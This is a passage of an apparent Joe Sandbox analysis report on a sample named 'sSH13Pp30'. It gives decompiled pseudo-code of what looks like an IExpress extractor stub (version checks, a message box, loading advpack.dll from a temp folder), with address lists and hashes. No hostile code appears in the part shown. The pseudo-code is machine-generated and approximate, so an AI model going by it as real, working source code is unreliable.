                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xe9a40 = _t119;
                                                                                                                                                                                                      						 *0xe8184 = 1;
                                                                                                                                                                                                      						 *0xe8180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xe9a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe8184 = _t135;
                                                                                                                                                                                                      							 *0xe8180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E000E44B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E000E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x000e36f9
                                                                                                                                                                                                      0x000e3700
                                                                                                                                                                                                      0x000e370c
                                                                                                                                                                                                      0x000e3716
                                                                                                                                                                                                      0x000e3718
                                                                                                                                                                                                      0x000e371b
                                                                                                                                                                                                      0x000e3721
                                                                                                                                                                                                      0x000e372b
                                                                                                                                                                                                      0x000e373d
                                                                                                                                                                                                      0x000e3745
                                                                                                                                                                                                      0x000e3746
                                                                                                                                                                                                      0x000e3746
                                                                                                                                                                                                      0x000e3749
                                                                                                                                                                                                      0x000e37ab
                                                                                                                                                                                                      0x000e37ad
                                                                                                                                                                                                      0x000e37ae
                                                                                                                                                                                                      0x000e37b3
                                                                                                                                                                                                      0x000e37b8
                                                                                                                                                                                                      0x000e37b8
                                                                                                                                                                                                      0x000e37bf
                                                                                                                                                                                                      0x000e37bf
                                                                                                                                                                                                      0x000e37c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e37cb
                                                                                                                                                                                                      0x000e37cd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e37d5
                                                                                                                                                                                                      0x000e37db
                                                                                                                                                                                                      0x000e37e8
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37f0
                                                                                                                                                                                                      0x000e37f6
                                                                                                                                                                                                      0x000e3805
                                                                                                                                                                                                      0x000e3817
                                                                                                                                                                                                      0x000e382b
                                                                                                                                                                                                      0x000e3830
                                                                                                                                                                                                      0x000e3836
                                                                                                                                                                                                      0x000e383b
                                                                                                                                                                                                      0x000e383d
                                                                                                                                                                                                      0x000e38eb
                                                                                                                                                                                                      0x000e38eb
                                                                                                                                                                                                      0x000e38f2
                                                                                                                                                                                                      0x000e390c
                                                                                                                                                                                                      0x000e3911
                                                                                                                                                                                                      0x000e3911
                                                                                                                                                                                                      0x000e3913
                                                                                                                                                                                                      0x000e394d
                                                                                                                                                                                                      0x000e394d
                                                                                                                                                                                                      0x000e394f
                                                                                                                                                                                                      0x000e38a9
                                                                                                                                                                                                      0x000e38a9
                                                                                                                                                                                                      0x000e38b0
                                                                                                                                                                                                      0x000e38b2
                                                                                                                                                                                                      0x000e38b9
                                                                                                                                                                                                      0x000e38bb
                                                                                                                                                                                                      0x000e38c1
                                                                                                                                                                                                      0x000e3975
                                                                                                                                                                                                      0x000e38c7
                                                                                                                                                                                                      0x000e38de
                                                                                                                                                                                                      0x000e38e0
                                                                                                                                                                                                      0x000e38e0
                                                                                                                                                                                                      0x000e397b
                                                                                                                                                                                                      0x000e397d
                                                                                                                                                                                                      0x000e39a9
                                                                                                                                                                                                      0x000e397f
                                                                                                                                                                                                      0x000e3982
                                                                                                                                                                                                      0x000e398b
                                                                                                                                                                                                      0x000e398d
                                                                                                                                                                                                      0x000e398f
                                                                                                                                                                                                      0x000e399f
                                                                                                                                                                                                      0x000e39a1
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e398f
                                                                                                                                                                                                      0x000e39af
                                                                                                                                                                                                      0x000e39b6
                                                                                                                                                                                                      0x000e3a0f
                                                                                                                                                                                                      0x000e3a0f
                                                                                                                                                                                                      0x000e3a11
                                                                                                                                                                                                      0x000e3a13
                                                                                                                                                                                                      0x000e3a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39b8
                                                                                                                                                                                                      0x000e39b8
                                                                                                                                                                                                      0x000e39ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39bc
                                                                                                                                                                                                      0x000e39bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39c3
                                                                                                                                                                                                      0x000e39c9
                                                                                                                                                                                                      0x000e39ce
                                                                                                                                                                                                      0x000e39d0
                                                                                                                                                                                                      0x000e39e3
                                                                                                                                                                                                      0x000e39e5
                                                                                                                                                                                                      0x000e39e6
                                                                                                                                                                                                      0x000e39f1
                                                                                                                                                                                                      0x000e39f7
                                                                                                                                                                                                      0x000e39fa
                                                                                                                                                                                                      0x000e3a01
                                                                                                                                                                                                      0x000e3a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3a06
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e3a0b
                                                                                                                                                                                                      0x000e3a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e39fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39fc
                                                                                                                                                                                                      0x000e39d3
                                                                                                                                                                                                      0x000e39d8
                                                                                                                                                                                                      0x000e39da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39dc
                                                                                                                                                                                                      0x000e39b6
                                                                                                                                                                                                      0x000e3955
                                                                                                                                                                                                      0x000e395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3961
                                                                                                                                                                                                      0x000e3963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x000e3915
                                                                                                                                                                                                      0x000e3915
                                                                                                                                                                                                      0x000e391b
                                                                                                                                                                                                      0x000e391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e392d
                                                                                                                                                                                                      0x000e3933
                                                                                                                                                                                                      0x000e3938
                                                                                                                                                                                                      0x000e393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3940
                                                                                                                                                                                                      0x000e3946
                                                                                                                                                                                                      0x000e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38f2
                                                                                                                                                                                                      0x000e3843
                                                                                                                                                                                                      0x000e3845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e384b
                                                                                                                                                                                                      0x000e384d
                                                                                                                                                                                                      0x000e3883
                                                                                                                                                                                                      0x000e3885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e389a
                                                                                                                                                                                                      0x000e389e
                                                                                                                                                                                                      0x000e389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38a0
                                                                                                                                                                                                      0x000e38a0
                                                                                                                                                                                                      0x000e38a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38a4
                                                                                                                                                                                                      0x000e384f
                                                                                                                                                                                                      0x000e3851
                                                                                                                                                                                                      0x000e3857
                                                                                                                                                                                                      0x000e386e
                                                                                                                                                                                                      0x000e3877
                                                                                                                                                                                                      0x000e387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3881
                                                                                                                                                                                                      0x000e3859
                                                                                                                                                                                                      0x000e385c
                                                                                                                                                                                                      0x000e3862
                                                                                                                                                                                                      0x000e3866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38f4
                                                                                                                                                                                                      0x000e38f4
                                                                                                                                                                                                      0x000e38f5
                                                                                                                                                                                                      0x000e38fb
                                                                                                                                                                                                      0x000e3901
                                                                                                                                                                                                      0x000e3901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e390a
                                                                                                                                                                                                      0x000e374b
                                                                                                                                                                                                      0x000e374e
                                                                                                                                                                                                      0x000e375c
                                                                                                                                                                                                      0x000e3764
                                                                                                                                                                                                      0x000e3769
                                                                                                                                                                                                      0x000e376e
                                                                                                                                                                                                      0x000e3771
                                                                                                                                                                                                      0x000e379c
                                                                                                                                                                                                      0x000e379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e37a3
                                                                                                                                                                                                      0x000e37a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e37a4
                                                                                                                                                                                                      0x000e3773
                                                                                                                                                                                                      0x000e3777
                                                                                                                                                                                                      0x000e3778
                                                                                                                                                                                                      0x000e377f
                                                                                                                                                                                                      0x000e3781
                                                                                                                                                                                                      0x000e378e
                                                                                                                                                                                                      0x000e378e
                                                                                                                                                                                                      0x000e3794
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3794
                                                                                                                                                                                                      0x000e3783
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3785
                                                                                                                                                                                                      0x000e378c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e378c
                                                                                                                                                                                                      0x000e3750
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e372d
                                                                                                                                                                                                      0x000e372d
                                                                                                                                                                                                      0x000e396b
                                                                                                                                                                                                      0x000e396b
                                                                                                                                                                                                      0x000e396c
                                                                                                                                                                                                      0x000e396e
                                                                                                                                                                                                      0x000e396f
                                                                                                                                                                                                      0x000e3a1e
                                                                                                                                                                                                      0x000e3a1e
                                                                                                                                                                                                      0x000e3a22
                                                                                                                                                                                                      0x000e3a27
                                                                                                                                                                                                      0x000e3a3e
                                                                                                                                                                                                      0x000e3a3e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 000E3723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000E39C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 000E39F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: 93a48c0bc8f6ec2467eed27b2a4c37439f5a9d9e236f4248a5a317e74dee6e4f
                                                                                                                                                                                                      • Instruction ID: 37769bdf3d7e7bb955a820cef94f087bcaeb5968dd0d431e1ea59b52b3a8fb4a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93a48c0bc8f6ec2467eed27b2a4c37439f5a9d9e236f4248a5a317e74dee6e4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D91F571A012D49FEBB48A16CD897EA7BF1AF85700F1540A9D889BB251DB758F80CF41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E000E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E000E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E000E658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x000e6495
                                                                                                                                                                                                      0x000e6495
                                                                                                                                                                                                      0x000e64a0
                                                                                                                                                                                                      0x000e64a7
                                                                                                                                                                                                      0x000e64ab
                                                                                                                                                                                                      0x000e64bd
                                                                                                                                                                                                      0x000e64c2
                                                                                                                                                                                                      0x000e64d3
                                                                                                                                                                                                      0x000e64df
                                                                                                                                                                                                      0x000e64e8
                                                                                                                                                                                                      0x000e6502
                                                                                                                                                                                                      0x000e64ee
                                                                                                                                                                                                      0x000e64f9
                                                                                                                                                                                                      0x000e64f9
                                                                                                                                                                                                      0x000e6516

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E64DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E64F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E6502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-2284591408
                                                                                                                                                                                                      • Opcode ID: 77f20172dd6e14af7b20516b06c99a5c5040b23f5d12f1ce3cabf6d67b1f6320
                                                                                                                                                                                                      • Instruction ID: f420955e701ca6099a83277675e472e7603ddf8550c2e63c8c076a2c9d37d4d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77f20172dd6e14af7b20516b06c99a5c5040b23f5d12f1ce3cabf6d67b1f6320
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F00126317001889FE790EB62EC89AEE7378DB65710F500195F585B61C0CF75AE858A01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				int _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E000E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E000E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E000E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x000e28f1
                                                                                                                                                                                                      0x000e28f4
                                                                                                                                                                                                      0x000e28f7
                                                                                                                                                                                                      0x000e28f9
                                                                                                                                                                                                      0x000e28fc
                                                                                                                                                                                                      0x000e28ff
                                                                                                                                                                                                      0x000e2901
                                                                                                                                                                                                      0x000e2907
                                                                                                                                                                                                      0x000e2a62
                                                                                                                                                                                                      0x000e2a64
                                                                                                                                                                                                      0x000e290d
                                                                                                                                                                                                      0x000e290d
                                                                                                                                                                                                      0x000e290f
                                                                                                                                                                                                      0x000e2912
                                                                                                                                                                                                      0x000e2920
                                                                                                                                                                                                      0x000e2937
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2944
                                                                                                                                                                                                      0x000e294a
                                                                                                                                                                                                      0x000e294f
                                                                                                                                                                                                      0x000e2a2f
                                                                                                                                                                                                      0x000e2a32
                                                                                                                                                                                                      0x000e2a34
                                                                                                                                                                                                      0x000e2a37
                                                                                                                                                                                                      0x000e2a41
                                                                                                                                                                                                      0x00000000
